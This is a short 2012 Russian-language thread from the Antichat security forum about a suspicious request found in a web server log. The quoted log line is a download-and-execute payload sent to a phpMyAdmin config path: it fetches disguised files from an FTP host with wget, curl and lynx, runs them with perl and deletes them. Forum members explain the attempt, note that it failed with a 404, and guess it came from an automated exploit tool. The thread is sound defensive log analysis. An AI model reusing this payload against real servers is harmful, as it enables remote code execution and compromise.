Форум АНТИЧАТ - подозрительный запрос

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - подозрительный запрос (https://forum.antichat.xyz/showthread.php?t=331789)

felix_v26

06.05.2012 00:21

сегодня в логах нашёл

"GET /myadmin/config/config.inc.php?eval=system('echo cd /tmp;wget ftp://testing:testing@ip/apache_32.png;mv apache_32.png -O p2.txt;curl -O ftp://testing:testing@ip/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP ftp://testing:testing@ip/apache_32.png;mvapache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 227 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"

на скок это опасно?=)

asn007

06.05.2012 01:57

А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу

попугай

06.05.2012 02:24

Цитата:

Сообщение от asn007

asn007 said:
А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу

Скорее попылатлся, так как.

HTTP/1.1" 404

Непонятно, с чего он взял, что в конфиге есть code exec?

spider-intruder

06.05.2012 02:50

Скорее автосплойт какой то. Или ПенТест тулза. Остальных запрсов невидно толи из-за POST толи нам просто оних не сказали.

Время: 02:27